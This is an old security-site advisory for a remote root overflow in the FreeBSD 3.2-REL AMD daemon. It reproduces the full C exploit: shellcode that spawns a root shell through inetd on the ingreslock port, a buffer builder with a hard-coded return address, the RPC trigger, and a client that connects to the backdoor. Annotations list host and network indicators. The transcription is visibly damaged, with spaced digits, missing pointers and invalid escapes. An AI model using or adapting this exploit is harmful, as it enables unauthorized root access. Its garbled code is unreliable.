FreeBSD AMD remote overflow(old)-vulnerability warning-the black bar safety net

ID MYHACK58:62200715596
Type myhack58
Reporter 佚名
Modified 2007-05-26T00:00:00


FreeBSD AMD remote overflow(old)

Relates to the program: FreeBSD AMD

Description: The AMD daemon shipped with FreeBSD 3.2-REL contains an overflow that allows remote access as root.

Details: The following is the test code for this remote overflow; it also needs a header file. The program is permitted for research purposes only; illegal use is at your own risk. Researchers are welcome to pass it on. Please download the code package: rpc_AMD_FreeBSD3_2REL.tar.gz

/* $Id$ fbsd_amd.c

fbsd_amd.c - The FreeBSD 3.2-REL AMD remote root exploit

Copyright (c) 1999 anathema <> All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */

include <stdio. h>

include <stdlib. h>

include <unistd. h>

include <string. h>

include <sys/types. h>

include <sys/socket. h>

include <sys/time. h>

include <netinet/in. h>

include <arpa/inet. h>

include <netdb. h>

include <rpc/rpc. h>

include "amd-incl. h"

define ADDR 0xbfbfd2a4 / FreeBSD 3.2-REL /

define RETPOS 1 0 0 5

define AMD_PROG 3 0 0 0 1 9

define AMD_VERS 1

/*
 * Payload bytes placed in the oversized RPC argument by overflow_buf().
 * The readable tail of the literal writes an inetd configuration line to
 * /tmp/x that binds a root shell to the "ingreslock" service, starts
 * /usr/sbin/inetd on that file and then removes it; shellz() below
 * connects to the resulting listener on TCP port 1524.  Host-side
 * indicators of this payload are therefore a short-lived /tmp/x, an
 * additional inetd process started from a file under /tmp, and an
 * unexpected listener on the ingreslock port.
 * NOTE(review): this transcription is damaged — e.g. the "\69" escape is
 * not a valid hex escape like its neighbours and "sh-i" looks mangled —
 * so the literal as shown does not reproduce the original byte string.
 */
char c0de[] = "\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4" "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10" "\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6" "\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02" "\x03\x03\x03\x03\x04\x04\x04\x04" "\x2f\x62\69\x6e\x2f\x73\x68\x20\x2d\x63\x20" "echo \"ingreslock stream tcp nowait root /bin/sh sh-i\">/tmp/x;" "/usr/sbin/inetd /tmp/x; /bin/rm-f /tmp/x";

/*
 * Resolve a dotted-quad string or host name to an IPv4 address.
 *
 * Tries inet_addr() first; if that yields -1 (INADDR_NONE) it falls back
 * to gethostbyname() and copies the first h_addr entry.  Returns the
 * address as produced by those calls, or 0 when the lookup fails.
 * Because INADDR_NONE is also the encoding of 255.255.255.255, that one
 * literal is indistinguishable from a parse failure here.
 * NOTE(review): the transcription is damaged — the parameter is shown as
 * `u_char host` and the in_addr member as `addr. server_address`, which
 * are not the original tokens — so this block does not compile as shown.
 */
u_long resolve_host(u_char host) { struct in_addr addr; struct hostent host_ent;

/* Numeric form first; fall back to a name lookup on INADDR_NONE. */
if ((addr. server_address = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (! host_ent) return((u_long)0); memcpy((char *)&addr. server_address, host_ent->h_addr, host_ent->h_length); }

return (addr. server_address); }

/*
 * Interactive relay to the listener the payload installs.
 *
 * Connects to TCP port 1524 ("ingreslock") on dst_ip and then loops
 * forever: select() on stdin and the socket, copy whatever the socket
 * sends to stderr, and copy whatever arrives on stdin to the socket.
 * Both failure paths (socket(), connect()) print with perror() and
 * exit(-1); the function never returns on success.
 *
 * Notes on the code as written:
 *  - read() return values are ignored; printing the socket buffer with
 *    "%s" relies solely on the memset() at the top of each iteration for
 *    termination, and write() sends strlen() of the stdin buffer.
 *  - The select() width is a hard-coded constant rather than sock + 1.
 *  - The function's closing brace is missing from this transcription,
 *    and the array sizes are shown with spaced digits.
 */
void shellz(u_long dst_ip) { struct sockaddr_in sin; u_char sock_buf[8 1 9 2]; fd_set fds; int sock;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); }

/* Destination is the ingreslock port the inetd line in c0de binds. */
sin. sin_family = AF_INET; sin. sin_port = htons(1 5 2 4); / ingreslock / sin. sin_addr. server_address = dst_ip;

if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connecting to backdoor"); exit(-1); }

fprintf(stderr, "\nHost %s successfully owned.\ n", inet_ntoa(sin. sin_addr)); for (;;) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds);

/* Buffer is re-zeroed every pass so the "%s" below sees a terminator. */
select(2 5 5, &fds, NULL, NULL, NULL); memset(sock_buf, 0, sizeof(sock_buf));

if (FD_ISSET(sock, &fds)) { read(sock, sock_buf, sizeof(sock_buf)); fprintf(stderr, "%s", sock_buf); }

if (FD_ISSET(0, &fds)) { read(0, sock_buf, sizeof(sock_buf)); write(sock, sock_buf, strlen(sock_buf)); } }


/*
 * Build the oversized argument passed to the AMD mount call.
 *
 * Lays out a zero-initialised 2048-byte local buffer as: 0x90 filler up
 * to RETPOS - strlen(c0de), the c0de bytes ending exactly at RETPOS, and
 * then the four bytes of ADDR in little-endian order.  Returns a
 * strdup()'d heap copy — which ends at the first zero byte after the
 * address — that the caller (exploit()) never frees.
 * The hard-coded ADDR/RETPOS pair is what restricts this to the single
 * binary build named in main()'s banner.
 * NOTE(review): digits in the array size are spaced and the shift
 * amounts are shown as "1 6"/"2 4" — transcription damage, not the
 * original source.
 */
u_char * overflow_buf(void){ u_char buf[2 0 4 8] = {0}; u_long addr = ADDR; int ret = RETPOS;

/* Filler, then the payload so that it ends at offset RETPOS. */
memset(buf, 0x90, ret - strlen(c0de)); memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));

/* Four address bytes, least significant first. */
buf[ret++] = (addr & 0xff); buf[ret++] = (addr >> 8) & 0xff; buf[ret++] = (addr >> 1 6) & 0xff; buf[ret++] = (addr >> 2 4) & 0xff;

return(strdup(buf)); }

<doc_update>
/*
 * Send the overflowing argument to the AMD RPC service on dst_ip, then
 * hand over to shellz().
 *
 * Copies overflow_buf()'s result into a 4096-byte local buffer, builds a
 * TCP RPC client for program AMD_PROG / version AMD_VERS (sin_port is 0,
 * which presumably lets the RPC library obtain the port via the
 * portmapper), issues amqproc_mount_1() — declared in amd-incl.h, not on
 * this page — with the buffer as its argument, sleeps two seconds,
 * destroys the client and calls shellz().  On the wire this is a single
 * AMQ MOUNT request with an argument of roughly RETPOS + 4 bytes; an amd
 * mount request that long from an unexpected peer is the network-side
 * indicator for this attack.
 *
 * Notes on the code as written:
 *  - The clnt_pcreateerror() label says "clntudp_create" although the
 *    call is clnttcp_create(); the message is misleading on failure.
 *  - The heap copy returned by overflow_buf() is never freed.
 *  - `CLIENT clnt` and `u_char ptr = buf` are missing their `*` in this
 *    transcription, as is `sin. sin_addr. server_address`.
 */
void exploit(u_long dst_ip) { struct sockaddr_in sin; CLIENT clnt; u_char buf[4 0 9 6] = {0}; u_char ptr = buf; int sock = RPC_ANYSOCK;

strncpy(buf, overflow_buf(), sizeof(buf));

/* Port 0: let the RPC library find the service's port. */
sin. sin_family = AF_INET; sin. sin_port = 0; sin. sin_addr. server_address = dst_ip;

clnt = clnttcp_create(&sin, AMD_PROG, AMD_VERS, &sock, 0, 0); if (! clnt) { clnt_pcreateerror("clntudp_create"); exit(-1); }

/* The sleep presumably gives the payload time to start inetd. */
fprintf(stderr, "\nIt's time to w8.. \n"); amqproc_mount_1(&ptr, clnt); sleep(2);

clnt_destroy(clnt); shellz(dst_ip); }

/* Print the one-line usage message to stderr and exit with status 0. */
void usage(u_char *argv0) { fprintf(stderr, "usage:\t%s dst_host|ip\n", argv0); exit(0); }

/*
 * Entry point: print the banner, require exactly one argument (the
 * target host or IP), resolve it with resolve_host(), echo the target
 * and the hard-coded ADDR, and call exploit().
 * Exits -1 when the address does not resolve; usage() exits 0.
 * NOTE(review): `/ NOTREACHED /` was presumably a comment in the
 * original; as transcribed it is not one, and `i_addr. server_address`
 * is likewise a damaged member name.  ADDR is passed to "%lx" — fine
 * only where long and the literal have the same width.
 */
int main(int argc, char **argv) { struct in_addr i_addr; u_long dst_ip = 0;

fprintf(stderr, "AMD exploit for FreeBSD 3. X <>\n" "Tested against FreeBSD 3.2-REL stock AMD binary.\ n\n");

if (argc != 2) { usage(argv[0]); / NOTREACHED / }

dst_ip = resolve_host(argv[1]); if (! dst_ip) { fprintf(stderr, "What kind of address is this: %s?\ n", argv[1]); exit(-1); }

i_addr. server_address = dst_ip; fprintf(stderr, "target : %s\n", inet_ntoa(i_addr)); fprintf(stderr, "addr : 0x%lx\n", ADDR);

exploit (dst_ip); }

/* EOF */

Solution: Turn off the AMD daemon on affected hosts.